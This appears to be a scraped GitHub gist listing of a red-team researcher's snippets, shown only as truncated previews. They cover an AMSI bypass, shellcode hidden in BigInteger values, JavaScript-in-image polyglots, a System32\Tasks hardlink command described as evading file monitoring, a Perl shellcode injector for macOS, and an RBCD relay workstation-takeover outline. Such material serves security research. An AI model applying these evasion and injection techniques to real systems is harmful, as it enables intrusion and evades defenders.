Skip to content

Instantly share code, notes, and snippets.


Dwight Hohnstein djhohnstein

View GitHub Profile
djhohnstein / FastDoubling.cs
Created Jul 26, 2022 — forked from code-scrap/FastDoubling.cs
FastDoubling - Mod RSA 129
View FastDoubling.cs
using System;
class GFG{
// Function calculate the N-th fibonacci
// number using fast doubling method
static void FastDoubling(BigInteger n, BigInteger []res)
BigInteger a, b, c, d;
BigInteger MOD = new BigInteger ("114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541",10);
djhohnstein / pnginator.rb
Created Jul 26, 2022 — forked from code-scrap/pnginator.rb
pnginator: pack Javascript into a self-extracting PNG
View pnginator.rb
#!/usr/bin/env ruby -w
# pnginator.rb: pack a .js file into a PNG image with an HTML payload;
# when saved with an .html extension and opened in a browser, the HTML extracts and executes
# the javascript.
# Usage: ruby pnginator.rb input.js output.png.html
# By Gasman <>
# from an original idea by Daeken:
djhohnstein / gifjs.asm
Created Jul 26, 2022 — forked from code-scrap/gifjs.asm
A Valid GIF and JS file
View gifjs.asm
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment
; inspired by Saumil Shah's Deadly Pixels presentation
; Ange Albertini, BSD Licence 2013
; yamal gifjs.asm -o img.gif
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment
djhohnstein /
Created Jul 26, 2022 — forked from code-scrap/
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.


djhohnstein / output
Created Jul 26, 2022 — forked from code-scrap/output
Shellcode as Numbers - A different kind of calc
View output
djhohnstein / patchless_amsi.h
Created Apr 18, 2022 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
View patchless_amsi.h
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
djhohnstein / shellBigInt.cs
Created Feb 8, 2022
Shellcode Stuffed in BigInteger
View shellBigInt.cs
sing System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
djhohnstein / sc.js
Created Feb 2, 2022
DynamicWrapperX - Register Code Example
View sc.js
//Example Reference:
// Test
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version=""/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
djhohnstein /
Created Oct 27, 2021 — forked from monoxgas/
Perl syscall/sc injection for MacOS
use DynaLoader;
use Devel::Peek;
use Fcntl;
use 5.008001; # because 5.6 doesn't have B::PV::object_2svref
use Config;
use B (); # for B::PV
sub mmap {
my ($addr, $size, $protect, $flags) = @_;
syscall(197, $addr, $size, $protect, $flags, -1, 0);
djhohnstein /
Created Sep 13, 2021 — forked from gladiatx0r/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.